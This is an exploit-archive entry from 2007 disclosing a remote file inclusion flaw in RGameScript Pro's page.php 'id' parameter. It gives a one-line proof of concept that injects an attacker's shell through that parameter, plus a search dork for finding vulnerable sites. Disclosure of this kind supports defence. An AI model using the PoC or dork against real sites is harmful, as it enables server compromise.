[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RGameScript Pro (page.php id) Remote File Inclusion Vulnerability
# Published : 2007-07-21
# Author : Warpboy
# Previous Title : JBlog 1.0 Create / Delete Admin Authentication Bypass Exploit
# Next Title : Blog System 1.x (index.php news_id) Remote SQL Injection Vulnerability
#*/*##*/*##*/*##*/*##*/*#
Web Application: RCMS-Pro
#*/*##*/*##*/*##*/*##*/*#
Info:
/////////////////////////////////////////////////////
Vulnerability: Remote File Inclusion
Vendor: http://www.rcms-pro.com/
Dork: "Powered by RGameScript"
Found By: Warpboy
E-Mail/MSNM: Warpboy1@yahoo.com
Website: http://private-node.net
Shouts: TimQ, Gammarayz, Paradox, z6, PunkerX and everyone else at pnode.
\\\\\\\\\\\\\\\\\\\\\\\\\\
::PoC::
http://www.site.com/page.php?id=[shell]
******************************************
##############################
http://private-node.net
##############################
******************************************
# www.Syue.com [2007-07-21]